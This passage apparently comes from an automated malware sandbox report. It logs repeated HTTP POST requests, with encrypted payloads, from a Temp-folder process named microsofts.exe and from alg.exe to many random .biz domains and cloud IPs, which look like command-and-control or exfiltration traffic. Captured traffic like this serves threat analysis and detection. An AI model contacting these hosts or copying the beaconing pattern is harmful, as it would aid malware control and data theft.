                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.062398911 CET778OUTData Raw: 8b 3d 33 63 0f 03 2b dd fe 02 00 00 80 be 23 2f 56 2b f2 bc a7 25 23 36 e5 f1 70 42 2b 5c fb 55 59 67 32 fe ee 27 d1 a3 7e 78 92 b3 22 4e 1b 8e 0e 2e aa 04 11 d9 9a 30 28 33 2c b8 35 eb f5 16 1f 35 fd 20 8e 26 6c 2a 57 1c 61 60 47 4b 4f 41 a8 56
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: =3c+#/V+%#6pB+\UYg2'~x"N.0(3,55 &l*Wa`GKOAVul.N@th?Vy'Y)o&c|Am8#`5j4+|cnBE`{J_J>{S.7.HL~#}jz+)
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.478646040 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9d7a78e30a2d4ad3863963a1cd7f1477|173.254.250.76|1730822656|1730822656|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              107192.168.2.55977818.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.842751980 CET351OUTPOST /ovwvug HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:15.847057104 CET828OUTData Raw: 96 a5 93 e3 5a b2 a0 64 30 03 00 00 8c c5 ab 48 26 03 e3 a8 33 4b be 71 9d 79 3f 5e a7 f2 fd 94 cb b6 b6 b6 86 2f 74 1c c9 8c 82 d5 38 24 9c 6d fc 98 c2 c8 85 5e 8f 1a 9b 34 ab 14 75 53 8c b9 53 7b a8 76 eb ca 55 3c 6a 20 28 9a d9 d5 83 8c 19 80
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Zd0H&3Kqy?^/t8$m^4uSS{vU<j (1l*\U?d0MRg#CAF?UvH>wOJLM?$f&xpu7W#y7%Wh${TGm?QXtbok+L!h-m[rxiTr5=II(/
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.512398958 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7f2be767f9777de67ddc17e258f1b92e|173.254.250.76|1730822656|1730822656|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              108192.168.2.55978013.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546449900 CET354OUTPOST /tgeilwrmlsau HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:16.546497107 CET828OUTData Raw: 7b 71 f1 f5 4e 4a b3 0d 30 03 00 00 9b 55 b1 f8 97 cb 4a 04 bc 6a 87 c7 a3 54 26 16 29 ef 4e 18 70 76 c4 09 93 71 9e c5 92 90 f0 e4 88 33 81 16 03 5e 1c c0 b0 86 e9 4e 15 a1 c8 26 fd a2 3a 1e 07 01 4c cd 93 89 93 6b 75 a7 17 72 34 f8 6d e8 c5 45
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {qNJ0UJjT&)Npvq3^N&:Lkur4mEK-mGU9P_VDD[!/&A{lRL`<q_""]6kfw"FqDs-KopJ"pS"q&j=|uj7[{^QUM~
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.005286932 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4ff414d2b5ecdefd62a414e83a79ceb2|173.254.250.76|1730822657|1730822657|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              109192.168.2.55978118.208.156.248801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.486206055 CET351OUTPOST /snkuws HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:17.487410069 CET778OUTData Raw: ed 6f 1a b9 69 5e 5f ee fe 02 00 00 ac 42 38 b4 96 11 1c 1a bc 7e 61 38 90 69 42 cd 06 f3 36 24 65 c9 d4 30 73 0e c3 c9 5c 70 96 87 92 52 56 ce 84 e0 40 d3 ed 84 00 43 00 4b 25 73 0f 30 9a 79 b4 4a 13 4d 3c 42 e8 80 7c 7a 64 95 2f 8f 4f 5b 69 6c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oi^_B8~a8iB6$e0s\pRV@CK%s0yJM<B|zd/O[ilRwQCb #tB}R|w}%4d<~MSQOxQg8 D?^"x!.P3'([H{eB1|vE|c%?)4Xv
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.143543959 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d354e3a91f93e8ecd82409b075f0fb05|173.254.250.76|1730822658|1730822658|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              110192.168.2.55978234.246.200.160801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252860069 CET346OUTPOST /x HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.252876997 CET828OUTData Raw: f0 21 9c f2 ce 0f 7a a4 30 03 00 00 a1 02 ce e9 7a 49 79 b3 c7 f0 4b d3 d3 e0 65 0a 20 21 21 83 c4 e0 68 c7 aa 84 13 a1 ce f4 7b 82 19 38 81 35 78 19 26 23 fd 3d 91 33 6a 7e 3d c1 bb f6 57 b3 21 51 a0 1a 72 79 ba cd a0 e0 2b 59 3d 5d 95 e1 d3 fa
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !z0zIyKe !!h{85x&#=3j~=W!Qry+Y=]t:57l)(^ZU"njaUbji0ZRCmQ!A)`,+wln_OH9atSt2/1z~[cB];<2GKm#|A('Q@!'d
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.223581076 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=21fddca3df215ee12ebfba8f437ac580|173.254.250.76|1730822659|1730822659|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              111192.168.2.55978318.246.231.120801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.913275957 CET348OUTPOST /hchtqxq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:18.913294077 CET778OUTData Raw: 28 19 d8 d3 6d 6f aa 24 fe 02 00 00 1e 27 32 c4 5f 0d 22 51 ff 3a 4b 73 1c 8d be 3f c3 08 87 89 0d 8b f4 6f 9b fc 06 cd 1b 17 7b 59 92 e3 a9 11 78 12 91 33 53 b2 39 70 91 d2 25 9c 2c 2c 46 c6 bf b5 bb 48 16 f2 de 67 5d 91 98 03 7a b6 e9 fa c8 04
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (mo$'2_"Q:Ks?o{Yx3S9p%,,FHg]z%{X}2@X@?wT7GsO&9^o|EVE5BPdmiWqECm:u_xvdz6>F3g?O0\@Q:e^Ws)
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.751663923 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ef3cedbc6815454db398ec71dbd8c69b|173.254.250.76|1730822659|1730822659|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              112192.168.2.55978418.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.246568918 CET345OUTPOST /cf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:19.246582031 CET828OUTData Raw: f1 e3 1c ee f1 b0 8f 50 30 03 00 00 f4 6d a8 e6 2a 19 0a 64 48 37 4c 49 d1 73 b7 90 5c cd 51 5c fc 5a 97 4a 3b 38 37 24 9c a6 e7 27 33 53 70 23 d3 6a 7c ad f4 8f ec 4b f2 1b 92 e7 b1 0c f0 ae 34 f0 65 4f 39 5c a4 71 e0 6e ec b7 2e fe 04 cc 8b 4a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: P0m*dH7LIs\Q\ZJ;87$'3Sp#j|K4eO9\qn.JW6tI51NSo:;|%vYXwlP#SWXmnc:SQZ#WEck5xqOW` gA9nU{jr&//_TZS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.683882952 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4e918d45b4c75612e87e3a0ad4fdd37e|173.254.250.76|1730822660|1730822660|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              113192.168.2.55978544.221.84.105801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.544490099 CET352OUTPOST /qirtwake HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.544518948 CET778OUTData Raw: 90 45 49 42 f9 dc 4d 1f fe 02 00 00 1d 29 fd b6 5e 0c 45 66 9f 29 4e fe 8d 2d a9 f8 27 2e db b8 b1 66 2e e7 74 a2 5c 11 a4 c6 0d 19 ab ba 35 f9 f7 2f e7 12 0b 4d b9 55 19 9c 17 d2 9e dd d5 b0 66 8f 2b d4 a4 5a a3 af a3 82 d5 ca 67 ee 0d 9b 99 9f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: EIBM)^Ef)N-'.f.t\5/MUf+Zgph\bU1dY-CLB@M~F2D}I!:Q8fN5l<Z{SeyEFuUp*3J[|:fT$a30]0gt,DV5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.218708992 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b55db5d20b58f9b372953fc76b9cb02|173.254.250.76|1730822661|1730822661|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              114192.168.2.55978613.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.707015991 CET353OUTPOST /lveagfnoqbuq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.707015991 CET828OUTData Raw: 3b 21 6f b3 ce 7d 5b 2d 30 03 00 00 18 f7 b7 9f 29 4f ab 23 d7 94 ad 95 c6 96 e0 a4 dd 29 21 6c ad 96 b3 20 ed e1 66 2e fb 01 7b 90 7a fe 6c 51 a2 2b 73 1b 5e 73 8a 50 09 c3 7f 4e a8 0e 08 9a 2c ee eb a5 53 7e 3d 19 d5 bf 26 c8 ab be cb a0 4d c0
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ;!o}[-0)O#)!l f.{zlQ+s^sPN,S~=&MM"?dc:n?@H@Z|5cYM}>Pja=io-|3 zB bN]bhVP)uXe1JC4Yr|CBeRNB&{B!<$1G'lW
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.132050037 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b91718c9633bb62eebc40a3fb0cd928c|173.254.250.76|1730822661|1730822661|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              115192.168.2.55978854.244.188.177801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.673212051 CET355OUTPOST /rsstpsksfhdhf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.673212051 CET778OUTData Raw: 01 1b cc 28 78 4e aa 6d fe 02 00 00 eb 96 b3 24 db 64 3e aa ac 62 b0 91 b1 82 b3 4b a1 a7 be 5e 88 aa 13 37 ec 00 f5 1a ef ce 21 b0 f1 20 41 ac fe 5d e8 ea 43 8c 92 0a 70 64 c1 d0 08 4a 20 e2 af b6 b7 54 ca 09 63 25 17 28 59 86 50 f8 14 91 cc ab
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (xNm$d>bK^7! A]CpdJ Tc%(YPc3dtp/Pnfl5jj[-m0mmhxOD%RKpQ!o#sJ4:1zA~BZi{SQ;.i"GOd N6=VW,A
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.540344000 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9a7067c382c8ea15d35bfd14d8fad94d|173.254.250.76|1730822662|1730822662|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              116192.168.2.55978918.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
